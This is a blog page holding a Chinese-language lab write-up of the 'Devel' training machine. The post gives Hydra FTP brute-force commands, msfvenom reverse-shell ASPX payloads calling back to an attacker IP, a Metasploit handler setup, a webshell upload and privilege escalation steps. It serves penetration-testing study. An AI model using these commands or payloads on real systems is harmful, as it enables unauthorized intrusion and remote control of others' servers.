

  <!DOCTYPE html>
  <html lang="en" data-default-color-scheme=&#34;dark&#34; >
  <style>
    .text1
    {
    text-shadow: 0px 0px 2px #f2f3f2;
    }
    </style>

  

<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/null">
  <link rel="icon" type="image/png" href="/null">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>Devel（ftp匿名登陆可读可写） - whale3070&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


    <body>
      <header style="height: 70vh;">
        <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>InfoSec learning</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          
        
      </ul>
    </div>
  </div>
</nav>

          <div class="banner" id="banner" false
            style="background: url('/img/default.png') no-repeat center center;
              background-size: cover;">
              <div class="full-bg-img">
                <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
                  <div class="page-header text-center fade-in-up">
                    <span class="h2 text1" id="subtitle" title="Devel（ftp匿名登陆可读可写）">
                      
                        Devel（ftp匿名登陆可读可写）
                      
                    </span>
        
                    
                      <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-20 15:27" pubdate>
        May 20, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      592 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      8
       分钟
    </span>
  

  
  
</div>

                    
                  </div>
                    
                  </div>
                  
                </div>
              </div>
          </div>
      </header>

      <main>
        
          

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Devel（ftp匿名登陆可读可写）</h1>
            
            <div class="markdown-body">
              <p>10.10.10.5</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs livecodeserver"><span class="hljs-number">21</span>/tcp <span class="hljs-built_in">open</span>  <span class="hljs-keyword">ftp</span>     Microsoft ftpd<br><span class="hljs-number">80</span>/tcp <span class="hljs-built_in">open</span>  <span class="hljs-keyword">http</span>    Microsoft IIS httpd <span class="hljs-number">7.5</span><br><br></code></pre></div></td></tr></table></figure>
<h2 id="ftp"><a href="#ftp" class="headerlink" title="ftp"></a>ftp</h2><figure class="highlight subunit"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs subunit">ftp 10.10.10.5<br>anonymous<br>03<span class="hljs-string">-18</span><span class="hljs-string">-17</span>  01:06AM       &lt;DIR&gt;          aspnet_client<br>03<span class="hljs-string">-17</span><span class="hljs-string">-17</span>  04:37PM                  689 iisstart.htm<br>01<span class="hljs-string">-11</span><span class="hljs-string">-19</span>  01:21AM                 2826 shell.aspx<br>01<span class="hljs-string">-11</span><span class="hljs-string">-19</span>  01:24AM                 2824 shell1.aspx<br>01<span class="hljs-string">-11</span><span class="hljs-string">-19</span>  01:30AM                 2863 shell2.aspx<br>03<span class="hljs-string">-17</span><span class="hljs-string">-17</span>  04:37PM               184946 welcome.png<br><br>get iisstart.htm<br>get shell.aspx<br>get shell1.aspx<br>get shell2.aspx<br>get welcome.png<br>cd aspnet_client<br>cd system_web<br>cd 2_0_50727<br>pwd<br>/aspnet_client/system_web/2_0_50727<br></code></pre></div></td></tr></table></figure>
<p>下载并查看后，推测aspx脚本是服务器上要用的脚本，但看不出具体用途</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><p><a target="_blank" rel="noopener" href="http://10.10.10.5/aspnet_client/system_web/">http://10.10.10.5/aspnet_client/system_web/</a> 403 forbidden<br>You do not have permission to view this directory or page using the credentials that you supplied.</p>
<p><a target="_blank" rel="noopener" href="http://10.10.10.5/shell.aspx">http://10.10.10.5/shell.aspx</a></p>
<h4 id="trying1"><a href="#trying1" class="headerlink" title="trying1"></a>trying1</h4><p>当进行信息搜集了以后，发现ftp共享的目录就是web目录。</p>
<p>如果可以上传一个aspx类型的shell，通过web就可以获取webshell。</p>
<p><code>hydra -l server -P /usr/share/wordlists/rockyou.txt -I 10.10.10.5 ftp</code><br><code>hydra -l ftp -P /usr/share/wordlists/rockyou.txt -I 10.10.10.5 ftp</code></p>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/11.PNG" srcset="/img/loading.gif" alt="11"></p>
<h4 id="trying2-生成一个aspx类型的shell。"><a href="#trying2-生成一个aspx类型的shell。" class="headerlink" title="trying2: 生成一个aspx类型的shell。"></a>trying2: 生成一个aspx类型的shell。</h4><figure class="highlight gradle"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs gradle">msfvenom -l formats | <span class="hljs-keyword">grep</span> asp<br>msfvenom -l payload | <span class="hljs-keyword">grep</span> windows | <span class="hljs-keyword">grep</span> meterpreter<br>msfvenom -p windows<span class="hljs-regexp">/x64/m</span>eterpreter_reverse_http LHOST=<span class="hljs-string">&quot;10.10.14.13&quot;</span> LPORT=<span class="hljs-number">7766</span> -o <span class="hljs-regexp">/root/</span>Desktop<span class="hljs-regexp">/5/g</span>lory.aspx<br><br>ftp put上传<br></code></pre></div></td></tr></table></figure>
<h4 id="trying3-msf"><a href="#trying3-msf" class="headerlink" title="trying3: msf"></a>trying3: msf</h4><p>设置监听</p>
<figure class="highlight gams"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs gams">use exploit/multi/handler<br><span class="hljs-keyword">set</span> payload <span class="hljs-comment">windows</span>/meterpreter/<span class="hljs-comment">reverse_tcp</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LHOST tun0</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LPORT 7766</span><br>run<br></code></pre></div></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/1.PNG" srcset="/img/loading.gif" alt="1"></p>
<p>失败</p>
<h2 id="获取一个webshell"><a href="#获取一个webshell" class="headerlink" title="获取一个webshell"></a>获取一个webshell</h2><p>重新上传asp类型的一句话，然后菜刀连接。</p>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/2.PNG" srcset="/img/loading.gif" alt="2"></p>
<figure class="highlight stata"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs stata">whoami<br><span class="hljs-keyword">iis</span> apppool\web<br><br><span class="hljs-keyword">net</span> user<br>Administrator            babis                    Guest                    <br>The command completed with <span class="hljs-keyword">one</span> or <span class="hljs-keyword">more</span> errors.<br></code></pre></div></td></tr></table></figure>
<p>权限不够，很多东西都看不了</p>
<h2 id="错误的总结"><a href="#错误的总结" class="headerlink" title="错误的总结"></a>错误的总结</h2><p>以下的命令生成的payload不能成功执行。注意x64，是64位的windows，血泪的教训，会报一个错。<br><code>msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&quot;10.10.14.13&quot; LPORT=7766 -o /root/Desktop/5/glory.aspx</code></p>
<p>正确的方式：<br><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&quot;10.10.14.13&quot; LPORT=7765 -f aspx  &gt; /root/Desktop/5/4.aspx</code></p>
<p>一开始在生成格式中纠结，是生成asp类型，还是apsx类型？<br><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/3.PNG" srcset="/img/loading.gif" alt="3"></p>
<h4 id="asp和aspx的区别"><a href="#asp和aspx的区别" class="headerlink" title="asp和aspx的区别"></a>asp和aspx的区别</h4><p>asp是十几年前的产品。</p>
<p>aspx是asp的升级版，aspx整合了.net框架,不仅仅能做网页</p>
<h4 id="关于set-ExitOnSession-false"><a href="#关于set-ExitOnSession-false" class="headerlink" title="关于set ExitOnSession false"></a>关于<code>set ExitOnSession false</code></h4><p>因为handler application可以继续作为作业（job）运行，即使在关闭或失败的meterpreter会话的情况下也是如此。它仅适用于作业（-j），因为这些是在后台运行的唯一作业。</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/4.PNG" srcset="/img/loading.gif" alt="4"></p>
<p>windows提权，使用的方法，<a target="_blank" rel="noopener" href="https://whale3070.github.io/training/2019/01/06/x/">search suggester</a></p>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/01-10/5.png" srcset="/img/loading.gif" alt="5"></p>
<figure class="highlight stata"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs stata"><span class="hljs-keyword">shell</span><br><span class="hljs-keyword">cd</span> c:\Users\Administrator\Desktop<br><span class="hljs-keyword">type</span> root.txt.txt<br></code></pre></div></td></tr></table></figure>
<h2 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h2><p>这一次渗透还挺顺利的，因为用到的都是以前就学过的知识。</p>
<p>几乎立即就认识到了攻击路径。</p>
<p>还行吧，继续加油。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/training/">training</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/training/">training</a>
                    
                      <a class="hover-with-bg" href="/tags/windows/">windows</a>
                    
                      <a class="hover-with-bg" href="/tags/port-21/">port 21</a>
                    
                  </div>
                
              </div>
              
                
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/05/20/2019-01-09-x/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">masscan结合python快速枚举批量主机端口</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/20/2019-01-11-x/">
                        <span class="hidden-mobile">Access（port:23-telnet登入反弹cmd）</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


            

                
                  <a id="scroll-top-button" href="#" role="button">
                    <i class="iconfont icon-arrowup" aria-hidden="true"></i>
                  </a>
                  

                    
                      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
                        

                          
      </main>

      <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://whale3070.github.io/" target="_blank" rel="nofollow noopener"><span>Whale3070</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>






  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



    </body>

  </html>